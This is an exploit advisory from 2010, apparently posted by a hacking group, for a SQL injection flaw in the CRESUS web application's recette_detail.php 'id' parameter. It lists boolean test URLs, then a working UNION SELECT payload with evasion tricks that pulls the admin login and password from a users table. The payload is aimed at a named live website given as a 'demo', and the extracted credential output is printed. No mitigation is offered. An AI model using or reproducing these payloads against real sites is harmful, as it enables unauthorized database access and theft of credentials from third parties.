=================================================== CRESUS. <= Remote SQL Injection Vulnerability =================================================== __ ____/___ __ \___ |_ \/ /___ / / /___ |___ __/___ / _ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ / / /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__ \____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/ ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : GRAYHATZ [~] Contact : N/A [~] HomePage : http://www.griadamlar.com ~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _____ Special Thanks GRAYHATZ, and Inj3ct0r Cr. __________ /_______ _________________ __ ___/_ __/_ __ `/__ ___/__ ___/ _(__ ) / /_ / /_/ / _ / _(__ ) /____/ \__/ \__,_/ /_/ /____/ MUS4LLAT - KaçaK - ameN - KnocKout - TechnicaL - Neuromancer - MahseN - BondBey ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : POWERED BY CRESUS. |~Price : N/A |~Version : N/A |~Software: http://www.cresus-net.net |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google Keyword : GRAYHATZ |[~]Date : "22.11.2010" |[~]Tested on:Apache PHP/4.3.4 MySQL >=5 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://www.bestbrands.com.tn http://www.calembo.biz/ang ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation|recette_detail.php SQL Injection~~~~~~~~~~~}| http://$Site/$path/ang/recette_detail.php?id=1 {SQL Injection} http://$Site/$path/ang/recette_detail.php?id=1 and 1=1 {True} http://$Site/$path/ang/recette_detail.php?id=1 and 1=0 {False} Ex; http://www.bestbrands.com.tn [~] SQL Injecting http://www.bestbrands.com.tn/ang/recette_detail.php?id=1/**/uniOn/**/seLect/**/NULL,NULL,group_concat%28login,0x3a,70737764%29,NULL,NULL,NULL,NULL/**/fRom/**/bestbrands_users/**/where%20id=1-- [~] MySQL Writes : adbestmin:70737764 =============================================================